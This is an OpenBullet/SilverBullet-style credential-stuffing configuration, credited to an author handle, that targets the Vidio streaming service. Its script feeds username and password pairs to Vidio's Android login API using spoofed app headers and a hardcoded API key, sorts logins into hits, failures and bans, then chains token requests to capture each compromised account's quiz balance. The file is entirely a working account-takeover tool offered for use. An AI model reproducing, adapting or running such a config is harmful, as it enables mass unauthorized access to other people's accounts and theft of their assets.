[SETTINGS]
{
  "Name": "Vidio by rick",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2023-03-18T10:42:32.6821382-07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@liiiioooiiiil",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Vidio",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION URLEncode "<USER>" -> VAR "us" 

FUNCTION URLEncode "<PASS>" -> VAR "ps" 

REQUEST POST "https://www.vidio.com/api/login" 
  CONTENT "login=<us>&password=<ps>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: www.vidio.com" 
  HEADER "Referer: android-app://com.vidio.android" 
  HEADER "X-Api-Platform: app-android" 
  HEADER "X-Api-Auth: laZOmogezono5ogekaso5oz4Mezimew1" 
  HEADER "User-Agent: vidioandroid/5.93.9-0b480024d1 (3189427)" 
  HEADER "X-Api-App-Info: android/7.1.2/5.93.9-0b480024d1-3189427" 
  HEADER "Accept-Language: en" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Content-Length: 47" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "X-Visitor-Id: 7f40cb9a-e79f-4123-99a7-758d0735b9b5" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"authentication_token\":\"" 
    KEY "eyJhbGciOiJIUzUxMiJ9" 
  KEYCHAIN Failure OR 
    KEY "Email address not found" 
    KEY "Please sign in with Facebook or Google." 
    KEY "Email and Password does not match" 
  KEYCHAIN Ban OR 
    KEY "Email dan kata sandi yang Anda masukkan tidak sesuai" 

PARSE "<SOURCE>" LR "\"authentication_token\":\"" "\"" -> VAR "atk" 

PARSE "<SOURCE>" LR "\"access_token\":\"" "\"" -> VAR "tk" 

FUNCTION GenerateGUID -> VAR "vis" 

REQUEST GET "https://www.vidio.com/api/users/subscriptions" 
  
  HEADER "Host: www.vidio.com" 
  HEADER "Referer: android-app://com.vidio.android" 
  HEADER "X-Api-Platform: app-android" 
  HEADER "X-Api-Auth: laZOmogezono5ogekaso5oz4Mezimew1" 
  HEADER "User-Agent: vidioandroid/5.93.9-0b480024d1 (3189427)" 
  HEADER "X-Api-App-Info: android/7.1.2/5.93.9-0b480024d1-3189427" 
  HEADER "Accept-Language: en" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "X-User-Email: <USER>" 
  HEADER "X-User-Token: <atk>" 
  HEADER "X-Visitor-Id: 7f40cb9a-e79f-4123-99a7-758d0735b9b5" 
  HEADER "X-Authorization: <tk>" 

REQUEST POST "https://www.vidio.com/auth" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: www.vidio.com" 
  HEADER "Referer: android-app://com.vidio.android" 
  HEADER "X-Api-Platform: app-android" 
  HEADER "X-Api-Auth: laZOmogezono5ogekaso5oz4Mezimew1" 
  HEADER "User-Agent: vidioandroid/5.93.9-0b480024d1 (3189427)" 
  HEADER "X-Api-App-Info: android/7.1.2/5.93.9-0b480024d1-3189427" 
  HEADER "Accept-Language: en" 
  HEADER "Content-Length: 0" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "X-User-Email: <USER>" 
  HEADER "X-User-Token: <atk>" 
  HEADER "X-Visitor-Id: <vis>" 

PARSE "<SOURCE>" LR "\"access_token\":\"" "\"" -> VAR "tk2" 

REQUEST GET "https://www.vidio.com/api/tokens" 
  
  HEADER "Host: www.vidio.com" 
  HEADER "Referer: android-app://com.vidio.android" 
  HEADER "X-Api-Platform: app-android" 
  HEADER "X-Api-Auth: laZOmogezono5ogekaso5oz4Mezimew1" 
  HEADER "User-Agent: vidioandroid/5.93.9-0b480024d1 (3189427)" 
  HEADER "X-Api-App-Info: android/7.1.2/5.93.9-0b480024d1-3189427" 
  HEADER "Accept-Language: en" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "X-User-Email: <USER>" 
  HEADER "X-User-Token: <atk>" 
  HEADER "X-Visitor-Id: <vis>" 
  HEADER "X-Authorization: <tk2>" 

PARSE "<SOURCE>" LR "\"token\":\"" "\"" -> VAR "tk3" 

REQUEST GET "https://quiz.vidio.com/api/player_data" 
  
  HEADER "Host: quiz.vidio.com" 
  HEADER "Pragma: no-cache" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Authorization: Bearer <tk3>" 
  HEADER "User-Agent: vidioandroid/5.93.9-0b480024d1 (3189427)" 
  HEADER "Accept: */*" 
  HEADER "X-Requested-With: com.vidio.android" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://quiz.vidio.com/main?platform=app-android&token=<tk3>&visitor_id=<vis>" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

PARSE "<SOURCE>" JSON "balance" CreateEmpty=FALSE -> CAP "Balance" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<Balance>" GreaterThan "0" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<Balance>" LessThan "1" 

